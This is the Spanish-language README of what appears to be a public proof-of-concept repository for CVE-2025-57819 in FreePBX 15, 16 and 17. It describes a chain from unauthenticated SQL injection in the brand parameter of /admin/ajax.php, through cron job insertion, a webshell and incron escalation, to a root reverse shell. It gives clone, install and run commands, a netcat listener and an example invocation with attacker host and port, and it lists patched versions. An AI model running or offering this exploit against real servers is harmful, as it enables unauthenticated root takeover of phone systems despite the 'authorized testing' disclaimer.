
PoC de cadena completa del CVE-2025-57819 para FreePBX 15, 16 y 17: SQLi no autenticado a RCE y toma de control de root.
PoC de cadena completa para CVE-2025-57819. La inyección SQL basada en errores no autenticada en el módulo endpoint de FreePBX encadena hasta una shell root mediante la inyección de trabajos cron y la escalada de privilegios por incron.
Solo para pruebas autorizadas e investigación. No lo uses contra sistemas que no sean tuyos.
SQLi (EXTRACTVALUE) → INSERT cron job → webshell drop → incron trigger → root shell
/admin/ajax.phpasteriskfwconsole como rootgit clone https://github.com/ozcanpng/CVE-2025-57819-FreePBX-RCE2Root
cd CVE-2025-57819-FreePBX-RCE2Root
pip install -r requirements.txt
python3 CVE-2025-57819.py <target> <lhost> <lport> [--cleanup]
Inicia un listener primero:
nc -lvnp 9999
Luego ejecuta:
python3 CVE-2025-57819.py freepbx.example.com 192.168.1.50 9999
--cleanup elimina la webshell y el trabajo cron después de la explotación.
FreePBX con el módulo endpoint instalado. El parámetro brand en /admin/ajax.php se pasa sin sanitizar a una consulta SQL.
| FreePBX | Patched Version |
|---|---|
| 15.x | 15.0.66 |
| 16.x | 16.0.89 |
| 17.x | 17.0.3 |
ozcanpng — github.com/ozcanpng — ozcanpng.dev